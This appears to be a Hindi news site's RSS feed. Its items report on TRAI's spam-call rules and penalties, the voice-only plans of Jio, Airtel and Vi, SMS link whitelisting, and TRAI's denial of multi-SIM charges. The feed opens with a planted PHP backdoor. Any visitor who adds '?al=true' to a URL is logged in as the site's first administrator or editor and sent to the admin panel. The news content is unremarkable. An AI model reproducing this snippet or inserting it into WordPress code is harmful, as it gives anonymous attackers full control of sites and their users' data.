// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); TRAI – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 19 Feb 2025 03:46:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 स्पैम कॉल्स से निजात, TRAI का बड़ा कदम, टेलीकॉम कंपनियों पर लगेगी सख्त पेनाल्टी https://pratyushaashakinayikiran.com/?p=132333 Wed, 19 Feb 2025 03:46:00 +0000 https://pratyushaashakinayikiran.com/?p=132333 नई दिल्ली

भारतीय दूरसंचार विनियामक प्राधिकरण (TRAI) ने कुछ माह पहले ही में टेलीकॉम कमर्शियल कम्युनिकेशन कस्टमर प्रेफरेंस रेगुलेशन (TCCCPR), 2018 में संशोधन किए थे। इसका मकसद अवांछित स्पैम कॉल और प्रमोशनल मैसेज पर लगाम लगाना था। इसके तहत इन नियमों का पालन न करने वाले टेलीकॉम ऑपरेटर्स पर भारी जुर्माना लगाए जाने का प्रावधान है।

TRAI का कहना था कि नए नियम लागू करने से पहले सभी हितधारकों की राय ली गई थी। वहीं, सेल्युलर ऑपरेटर्स एसोसिएशन ऑफ इंडिया (COAI) ने इन नए नियमों की जमकर आलोचना की है, खासकर टेलीकॉम कंपनियों पर लगने वाले जुर्माने को लेकर।

भारतीय टेलिकॉम अथॉरिटी ऑफ इंडिया (TRAI) की तरफ से Spam Calls को रोकने के लिए नियमों को सख्त किया और पेनल्टी की भी बात कही है. मोबाइल यूजर्स आसानी से स्पैम कॉल्स की रिपोर्ट कर सकेंगे और अनचाहे कमर्शियल कॉल्स (UCC) से भी छुटकारा भी पा सकेंगे. इसके लिए TRAI ने X प्लेटफॉर्म (पुराना नाम Twitter) पर पोस्ट करके जानकारी दी.

TRAI ने कंज्यूमर्स प्रोटेक्शन को बेहतर करने के लिए टेलीकॉम कमर्शियल कम्युनिकेशन्स कस्टमर प्रिफ्रेंसेंस रेगुलेशन (TCCCPR), 2018 में संशोधन किया है. इसके बाद यूजर्स को 10 नंबर से आने वाले टेलीमार्केटिंग कॉल्स से छुटकारा मिल सकेगा और रिपोर्ट के प्रोसेस को भी आसान करने को कहा है. यहां टेलिकॉम कंपनियों पर जुर्माने की बात कही है. इसके बाद टेलिकॉम कंपनियों ने इस फैसले पर आपत्ति दर्ज की है.

नई सीरीज को लागू करने को कहा

TRAI की तरफ से पहले ही कमर्शियल कम्युनिकेशन्स के लिए 10 नंबर वाले मोबाइल नंबर को बंद किया जा चुका है. इसके लिए नई नंबर सीरीज की शुरुआत होगी, जो 140 और 1600 सीरीज से शुरू होगी. 140 नंबर सीरीज का इस्तेमाल करके प्रमोशनल्स कॉल्स और वहीं 1600 सीरीज को ट्रांजेक्शन रिलेटेड कॉल्स के लिए इस्तेमाल करना होगा.

अनरजिस्टर्ड टेलिमार्केटर्स पर शिकंजा कसना

TRAI के नए फैसले के बाद अनरजिस्टर्ड टेलिमार्केटर्स पर शिकंजा कसना है, जो टेलिकॉम रिसोर्स का मनमर्जी तरीके से इस्तेमाल कर रहे हैं. इसके लिए जुर्माना भी लगाया जाएगा. टेलिमार्केटर्स द्वारा पहली बार नियमों का उल्लंघन करने पर 15 दिन का सस्पेंशन होगा, जबकि दोबारा नियम तोड़ने पर टेलिकॉम रिसोर्स को 1 साल के लिए डिसकनेक्ट किया जा सकता है.

टेलीकॉम कंपनियों पर भी लगेगा जुर्माना

यहां टेलिकॉम ऑपरेटर्स को भी फाइन का सामना करना पड़ सकता है. टेलिकटम कंपनियां को नॉन कंप्लाइंस के लिए फाइनेंशियल पेनल्टीज का सामना करना पड़ेगा. इस फाइन की शुरुआती रकम 2 लाख रुपये होगी, जो 5 लाख रुपये तक हो सकती है. दोबारा गलती पाए जाने पर 10 लाख रुपये तक का जुर्माना हो सकता है.

COAI ने कहा, मैसेजिंग ऐप्स को बाहर क्यों रखा?

टेलिकॉम कंपनियों की संस्था COAI की तरफ से टेलिकॉम कंपनियों पर जुर्माना बढ़ाने को लेकर आपत्ति दर्ज की है. साथ ही उन्होंने मेंशन किया कि इसमें सोशल मैसेजिंग ऐप्स जैसे WhatsApp और Telegram आदि को बाहर क्यों रखा है.

 

]]>
TRAI के सख्त आदेश के बाद टेलीकॉम कंपनियों ने लॉन्च किए सस्ते प्लान्स, ये है Jio-Airtel-Vi की पूरी लिस्ट https://pratyushaashakinayikiran.com/?p=125233 Sat, 25 Jan 2025 12:36:00 +0000 https://pratyushaashakinayikiran.com/?p=125233 मुंबई

TRAI की तरफ से टेलिकॉम कंपनियों को दिए गए दिशा निर्देश का अब पूरी तरह से असर दिख रहा है। ट्राई ने कुछ दिन पहले ही टेलिकॉम कंपनियों के लिए वॉइस ओनली प्लान का नियम नियम तय किया था और अब जियो, एयरटेल और वीआई ने इस पर अमल करना शुरू कर दिया है। जियो और एयरटेल के बाद वीआई ने अपने ग्राहकों के लिए बड़ा धमाका कर दिया है। Vi ने अपने करोड़ों फैंस के लिए Voice Only Plan लॉन्च कर दिया है।

देश की तीसर सबसे बड़ी टेलिकॉम कंपनी वोडाफोन आइडिया ने अपने पोर्टफोलियो में नया वॉइस ओनल प्लान एड कर दिया है। Vi अपने वॉइस ओनली प्लान्स में ग्राहकों को लंबी वैलिडिटी के साथ साथ फ्री एसएमएस की सुविधा दे रहा है। आइए आपको वीआई के इस लेटेस्ट लॉन्च प्लान के बारे में डिटेल से बताते हैं।

Jio-Airtel के बाद Vi का धमाका

आपको बता दें कि ट्राई के निर्देश के बाद हाल ही में दिग्गज कंपनी रिलायंस जियो ने अपने ग्राहको के लिए दो धांसू वॉइस ओनली प्लान्स पेश किए थे। जियो के बाद एयरटेल ने भी अपने यूजर्स के लिए दो किफायती वॉइस ओनली प्लान्स पेश कर दिए। ऐसे में वीआई कहां पीछे रहने वाली थी। वीआई ने भी अपनी लिस्ट में सस्ता और किफायती वॉइस ओनली प्लान जोड़ दिया है। बता दें कि कंपनी के इस प्लान की कीमत 1460 रुपये है।

1460 रुपये Voice-Only में आपको कुल 270 दिनों की वैलिडिटी मिलती है। इसमें आप 270 दिन तक किसी भी नेटवर्क में अनलिमिटेड फ्री कॉलिंग कर सकते हैं। इसके अलावा आपको 270 दिन तक डेली 100 फ्री एसएमएस भी दिए जाते हैं। यह एक वॉइस ओनली प्लान है इसलिए इसमें आपको डेटा बेनिफिट्स नहीं मिलते हैं।

Jio के Voice Only प्लान

रिलायसं जियो देश की सबसे बड़ी टेलिकॉम कंपनी है। जियो के पास इस समय करीब 49 करोड़ यूजर्स मौजूद हैं। कंपनी ने ट्राई के निर्देश को मानते हुए करोड़ों ग्राहकों के लिए दो सस्ते और किफायती वॉइस ओनली प्लान्स पेश किए हैं।  जियो ने 458 रुपये रुपये और 1958 रुपये के दो वॉइस ओनली प्लान्स लॉन्च किए हैं। 458 रुपये वाले प्लान में ग्राहकों को 84 दिन तक अनलिमिटेड कॉलिंग और एसएमएस ऑफर किए जाते हैं। 1958 रुपये वाले प्लान में यूजर्स को 365 दिनों की वैलिडिटी मिलती है। इसमें कंपनी ग्राहकों को पूरी वैलिडिटी के लिए 3600 SMS ऑफर करती है।

]]>
उपभोक्ताओं को अनचाहे लिंक संदेशों से बचाने की ट्राई की पहल, 01 अक्टूबर से मैसेज में अनचाहे और गलत लिंक पर रोक https://pratyushaashakinayikiran.com/?p=76039 Fri, 27 Sep 2024 10:16:00 +0000 https://pratyushaashakinayikiran.com/?p=76039 नई दिल्ली
भारतीय दूरसंचार नियामक प्राधिकरण (ट्राई) 1 अक्टूबर से फोन मैसेज में यूआरएल से संबंधित अपने निर्देशों को लागू करने जा रहा है। इसका मतलब है कि अब मैसेज में केवल अनुमति प्राप्त प्रेषक ही यूआरएल, एपीके (एंड्रॉइड पैकेज किट), या ओटीटी (ओवर द टॉप) लिंक भेज पायेंगे।

ट्राई की इस पहल का उद्देश्य सुरक्षित संचार प्रणाली को बढ़ावा देना है ताकि उपभोक्ताओं को गलत और अनचाहे लिंक संदेशों से बचाया जा सके। ट्राई ने 20 अगस्त को सभी एक्सेस प्रदाताओं को श्वेत सूची के बाहर यूआरएल, एपीके (एंड्रॉइड पैकेज किट) या ओटीटी (ओवर द टॉप) लिंक वाले किसी भी ट्रैफ़िक को ब्लॉक करने का निर्देश दिया गया था।

ट्राई ने ट्राई पंजीकृत प्रेषकों को यूआरएल वाले एसएमएस ट्रैफ़िक के सुचारू प्रवाह को सुनिश्चित करने के लिए अपने श्वेतसूची वाले लिंक को संबंधित एक्सेस प्रदाताओं के पोर्टल पर तुरंत अपलोड करने की सलाह दी है। अब तक 3 हजार से अधिक पंजीकृत प्रेषकों ने 70 हजार से अधिक लिंक को श्वेतसूची में डालकर निर्देश का अनुपालन किया है। वहीं, जो प्रेषक नियत तिथि तक अपने लिंक को श्वेत सूची में डालने में विफल रहेगा वे लिंक वाले किसी भी मैसेज को प्रसारित नहीं कर पायेगा।

 

 

]]>
स्‍पैम कॉल पर कसेगी लगाम, गैर-पंजीकृत इकाइयों का कटेगा कनेक्‍शन; दो साल के लिए ब्‍लैक लिस्‍ट करने https://pratyushaashakinayikiran.com/?p=60706 Thu, 15 Aug 2024 15:22:00 +0000 https://pratyushaashakinayikiran.com/?p=60706 नई दिल्ली
 ट्राई ने टेलीकाम कंपनियों से अवांछित (स्पैम) काल करने वाली गैर पंजीकृत संस्थाओं के सभी दूरसंचार संसाधनों का कनेक्शन काटने का निर्देश दिया है। साथ ही ऐसी कंपनियों को दो साल तक के लिए काली सूची में डालने को कहा है।

इस दौरान किसी भी दूरसंचार कंपनी की तरफ से उन्हें नए कनेक्शन आवंटित नहीं किए जाएंगे। नियामक ने दूरसंचार कंपनियों को इस निर्देश का तत्काल पालन करने और इस संबंध में की गई कार्रवाई के बारे में पाक्षिक आधार पर नियमित ब्योरा देने को भी कहा है।

टेलीमार्केटिंग कंपनियों के दिया निर्देश

ट्राई ने कहा कि इस 'निर्णायक कार्रवाई' से बिना पंजीकरण वाली टेलीमार्केटिंग कंपनियों की तरफ से उपभोक्ताओं को की जाने वाली अवांछित काल में कमी आने और ग्राहकों को राहत मिलने की उम्मीद है।

दूरसंचार नियामक ट्राई ने थोक कनेक्शन और दूसरे दूरसंचार साधनों का इस्तेमाल करने वाले सभी गैर-पंजीकृत टेलीमार्केटिंग (यूटीएम) कंपनियों से प्रचार के लिए की जाने वाली काल पर रोक लगाना सभी दूरसंचार कंपनियों के लिए अनिवार्य कर दिया है, चाहे ये संदेश पहले से रिकार्ड हों या कंप्यूटर-जनित हों।

ट्राई ने दिया नियमित अपडेट का निर्देश

ट्राई ने सभी दूरसंचार कंपनियों को अपनी नवीनतम निर्देश का अनुपालन करने और हर महीने की पहली और 16 तारीख को इस संबंध में की गई कार्रवाई पर नियमित अपडेट देने का भी निर्देश दिया है।

नियामक ने स्पैम काल पर लगाम लगाने की मंशा से पिछले हफ्ते सभी दूरसंचार कंपनियों के नियामकीय प्रमुखों के साथ बैठक की थी।

इस बैठक में एयरटेल, बीएसएनएल, रिलायंस जियो, टाटा टेलीसर्विसेज लिमिटेड, वोडाफोन आइडिया लिमिटेड, क्वाड्रेंट टेलीवेंचर्स लिमिटेड (क्यूटीएल) और वी-कान मोबाइल एंड इन्फ्रा प्राइवेट लिमिटेड के अधिकारियों ने शिरकत की थी।

]]>
मोबाइल में एक से ज्यादा सिम कार्ड चलाने पर देना होगा चार्ज? दूरसंचार विभाग ने बताया सच https://pratyushaashakinayikiran.com/?p=41945 Sun, 16 Jun 2024 09:06:00 +0000 https://pratyushaashakinayikiran.com/?p=41945 मुंबई

टेलिकॉम रेगुलेटरी अथॉरिटी ऑफ इंडिया (Trai) की ओर से साफ कर दिया गया है कि उसका मोबाइल यूजर्स से एक या उससे ज्यादा सिम के लिए चार्ज वसूलने का कोई प्लान नहीं है। ट्राई ने कहा कि सिम कार्ड एक सीमित सरकारी संपत्ति है, जिसका सही से इस्तेमाल होना चाहिए। इसके लिए ट्राई की ओर से टेलिकॉम सेक्टर के नए नियमों को ध्यान में रखते हुए मोबाइल नंबर सिस्टम का रिव्यू किया जा रहा है। लेकिन ट्राई ने साफ कहा कि उसकी ओर से मोबाइल नंबर के लिए चार्ज नहीं लिया जाएगा।

नई नंबर सीरीज का प्रस्ताव
ट्राई ने माना कि आज के वक्त में मोबाइल नंबर की कमी जरूर है। साल 2024 तक भारत में 1.19 अरब से ज्यादा टेलिकॉम कनेक्शन हो चुके हैं। साथ ही लगातार मोबाइल नंबर की मांग बढ़ रही है। यही वजह है कि ट्राई की ओर से नई नंबरिंग सीरीज का प्रस्ताव दिया गया है, जिससे मोबाइल नंबरिंग सिस्टम को दुरुस्त किया जा सके।

इतने सारे सिम कार्ड हैं इनएक्टिव
ट्राई की ओर से अनयूज्ड सिम को इस्तेमाल में लाने की योजना पर भी काम चल रहा है। उदारण के लिए अगर आपने दो या उससे ज्यादा सिम इश्यू कराया है और उस सिम का लंबे वक्त से इस्तेमाल नहीं कर रहे हैं, तो ऐसे सिम को ब्लैकलिस्ट करने की तैयारी है, जिससे उस सिम नंबर को दूसरे को अलॉट किया जा सके। ट्राई के आंकड़ों के मुताबिक भारत में इनएक्टिव सिम की संख्या काफी ज्यादा है। मौजूदा वक्त में 219.14 मिलियन से ज्यादा मोबाइल नंबर इनएक्टिव मोड में है, जो सरकार पर मोबाइन नंबर सिस्टम की कमी का दबाव बढ़ा रहे हैं। यह कुल मोबाइल नंबर का करीब 19 फीसद है।

ट्राई ने इस बारे में सोशल मीडिया साइट X पर भी लिखा है कि ट्राई द्वारा कई सिम रखने पर ग्राहकों को चार्ज किए जाने की अटकलें पूरी तरह से गलत हैं और लोगों को गुमराह करने वाली हैं. ट्राई की ओर से ऐसी कोई घोषणा नहीं की गई है. यानी अगर आपके पास एक फोन में एक से ज्यादा सिम हैं तो आपको बिल्कुल परेशान होने की जरूरत नहीं है. ट्राई ने इस तरह की सभी रिपोर्ट्स को खारिज कर दिया है. आपको भविष्य में कोई चार्ज नहीं लिया जाएगा.

]]>